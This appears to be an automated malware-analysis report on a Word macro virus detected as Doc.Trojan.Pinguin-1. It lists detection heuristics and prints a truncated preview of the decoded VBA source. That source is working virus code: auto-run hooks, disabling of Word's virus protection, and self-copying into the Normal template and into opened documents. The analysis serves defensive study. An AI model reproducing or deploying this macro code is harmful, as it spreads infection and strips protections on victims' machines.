MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Word document containing VBA macros, identified by ClamAV as 'Doc.Trojan.Pinguin-1'. The AutoOpen and AutoClose macros trigger an 'Infection' subroutine which uses Shell() calls to execute code, likely for persistence via registry keys. The script also attempts to save the document, potentially to spread itself.
Heuristics 7
-
ClamAV: Doc.Trojan.Pinguin-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Pinguin-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19607 bytes |
SHA-256: e07132bd8c6d3b8f3e815157d420f18e76e3c57de89153d297eec8220ac2f4fa |
|||
|
Detection
ClamAV:
Doc.Trojan.Pinguin-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'
'Virus Name: Pinguin[Clau/UC]
'Created By Clau/Ultimate Chaos.
'
Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Declare Function RegDeleteValueA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function DeleteFileA Lib "kernel32.dll" (ByVal lpFileName As String) As Long
Global Const REG_DWORD As Long = 4
Global Const REG_SZ As Long = 1
Global Const HKEY_CURRENT_USER As Long = &H80000001
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const vir_module = "Pinguin"
Dim k As Long
Dim s As Long
Dim u As Long
Dim a As Long
Dim b As String
Sub AutoNew()
Infection
End Sub
Sub AutoOpen()
Infection
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub AutoClose()
Infection
End Sub
Sub FileSave()
Infection
ActiveDocument.Save
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
Infection
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub Infection()
Application.ShowVisualBasicEditor = False
b = "C:\Clau-UC.VXD"
Poly
PayLoad
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.SavePropertiesPrompt = False
.ConfirmConversions = False
End With
GlobalInstalled = False
DocumentInstalled = False
For i = 1 To NormalTemplate.VBProject.vbcomponents.Count
If NormalTemplate.VBProject.vbcomponents(i).Name = vir_module Then
GlobalInstalled = True
End If
Next
For i = 1 To ActiveDocument.VBProject.vbcomponents.Count
If ActiveDocument.VBProject.vbcomponents(i).Name = vir_module Then
DocumentInstalled = True
End If
Next
If GlobalInstalled = False Then
ActiveDocument.VBProject.vbcomponents.Item(vir_module).export (b)
NormalTemplate.VBProject.vbcomponents.Import (b)
DeleteFileA (b)
Options.SaveNormalPrompt = False
End If
If DocumentInstalled = False Then
NormalTemplate.VBProject.vbcomponents.Item(vir_module).export (b)
ActiveDocument.VBProject.vbcomponents.Import (b)
DeleteFileA (b)
End If
Application.DisplayAlerts = wdAlertsAll
End Sub
Sub PayLoad()
On Error Resume Next
Retro
Randomize Timer
If Day(Now()) = 1 Then MsgBox "In every 2 of every month of every year" + Chr(13) + "I'll tell you my secret !!!", vbOKOnly, Date
If Day(Now()) = 8 Then
MsgBox "Pinguin Virus Created By Clau/Ultimate Chaos", vbOKOnly, "Secret Info"
CommandBars("tools").Controls("Macro").Caption = "Micro"
CommandBars.ActiveMenuBar.Controls.Item("UC").Delete
Set newMenu = CommandBars.ActiveMenuBar.Controls.Add(Type:=msoControlPopup, ID:=1, Temporary:=True)
newMenu.Caption = "&UC"
Set ctrl1 = newMenu.Controls.Add(Type:=msoControlButton, ID:=1)
ctrl1.Caption = "Pinguin"
ctrl1.TooltipText = "Pinguin"
ctrl1.Style = msoButtonCaption
ctrl1.OnAction = "VInfo"
Else
CommandBars.ActiveMenuBar.Controls.Item("UC").Delete
End If
If In
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.